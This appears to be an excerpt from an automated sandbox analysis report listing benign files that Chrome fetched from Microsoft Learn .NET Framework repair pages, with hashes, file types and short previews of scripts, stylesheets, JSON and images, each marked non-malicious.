                                                                                                                                                                                              Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):3130
                                                                                                                                                                                              Entropy (8bit):4.790069981348324
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                              MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                              SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                              SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                              SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):15427
                                                                                                                                                                                              Entropy (8bit):7.784472070227724
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                              MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                              SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                              SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                              SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):464328
                                                                                                                                                                                              Entropy (8bit):5.074669864961383
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:XegPryKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:gKCerXyUh
                                                                                                                                                                                              MD5:CB0701D474D57F8C8E2F569161CE0349
                                                                                                                                                                                              SHA1:4BE2E0C148DED16354E7A91FE721644897C5503C
                                                                                                                                                                                              SHA-256:AD52B36EA7D484522BA3382718BD370E6804F7B46AD3BE821D94AF81D66F40EB
                                                                                                                                                                                              SHA-512:BB54B08F64F85498D6592C614F844842CD87BA5A9127B1D2B8AFAEC8086DE171642EA2D241708C9D06DEFDDFA04A4189AAD4814AFD15303C6481F23793CD2D3F
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/site-ltr.css
                                                                                                                                                                                              Preview:.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):25441
                                                                                                                                                                                              Entropy (8bit):5.152769469811509
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:63jAjCjKjvjXLQjt6j+F/XwHv1gWj/rlOVqnACpK3o3hhl0OU2/8BlsRw/6szFrX:PIFIv11pOVqlh382/rIN1v
                                                                                                                                                                                              MD5:CCDED74C889AFA3851036BDF0CADB421
                                                                                                                                                                                              SHA1:E7263595381709693C603531E5F125F10C01641C
                                                                                                                                                                                              SHA-256:E8577F9831DBFDABD050EB0B30AB35060C7CA337DB0911F7F42C09E6E265AA9D
                                                                                                                                                                                              SHA-512:3270A6A71CBCA125DADBF9BB3928201D233788CDA14A00DC01865574AC443CADCC2AE80C269657938DC1D9F8F1DB11AAEC48E42D31031635332D9526AF0C9930
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):179328
                                                                                                                                                                                              Entropy (8bit):5.435214716283537
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVh:Wof3G0NSkNzMeO7z/l3h
                                                                                                                                                                                              MD5:9AAA131F34337E930B99FC2A183CD7C8
                                                                                                                                                                                              SHA1:531725F3A406D8ACE021F5048FDC8ABE7C999240
                                                                                                                                                                                              SHA-256:047241CD288B327E265C49B6AF8226FF309F1EAA38C7A10AE1F965CDE3BD64B1
                                                                                                                                                                                              SHA-512:8C3822816E6EC67E83B8CED11F8125E5F07FFF82B6B584F789A0DBCE52D88A04861152EBDB930C5EA12D6289BB8D905F3A044688ABFC0FB614F4AF311C137D52
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                                                                                                                                                                                              Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):25441
                                                                                                                                                                                              Entropy (8bit):5.152769469811509
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:63jAjCjKjvjXLQjt6j+F/XwHv1gWj/rlOVqnACpK3o3hhl0OU2/8BlsRw/6szFrX:PIFIv11pOVqlh382/rIN1v
                                                                                                                                                                                              MD5:CCDED74C889AFA3851036BDF0CADB421
                                                                                                                                                                                              SHA1:E7263595381709693C603531E5F125F10C01641C
                                                                                                                                                                                              SHA-256:E8577F9831DBFDABD050EB0B30AB35060C7CA337DB0911F7F42C09E6E265AA9D
                                                                                                                                                                                              SHA-512:3270A6A71CBCA125DADBF9BB3928201D233788CDA14A00DC01865574AC443CADCC2AE80C269657938DC1D9F8F1DB11AAEC48E42D31031635332D9526AF0C9930
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                                                                                                                              Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):15427
                                                                                                                                                                                              Entropy (8bit):7.784472070227724
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                              MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                              SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                              SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                              SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                                                                                                                              Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):52717
                                                                                                                                                                                              Entropy (8bit):5.462668685745912
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                              MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                              SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                              SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                              SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):1432
                                                                                                                                                                                              Entropy (8bit):4.986131881931089
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                              MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                              SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                              SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                              SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              URL:https://learn.microsoft.com/static/assets/0.4.028726178/global/deprecation.js
                                                                                                                                                                                              Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):52717
                                                                                                                                                                                              Entropy (8bit):5.462668685745912
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                              MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                              SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                              SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                              SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                                                                                                                              Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):1173007
                                                                                                                                                                                              Entropy (8bit):5.503893944397598
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                              MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                              SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                              SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                              SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
                                                                                                                                                                                              Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                              Entropy (8bit):3.875
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:HMB:k
                                                                                                                                                                                              MD5:0B04EA412F8FC88B51398B1CBF38110E
                                                                                                                                                                                              SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
                                                                                                                                                                                              SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
                                                                                                                                                                                              SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
                                                                                                                                                                                              Preview:CgkKBw2/5iXyGgA=
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):13339
                                                                                                                                                                                              Entropy (8bit):7.683569563478597
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                              MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                              SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                              SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                              SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
                                                                                                                                                                                              Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):17174
                                                                                                                                                                                              Entropy (8bit):2.9129715116732746
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                              MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                              SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                              SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                              SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              URL:https://learn.microsoft.com/favicon.ico
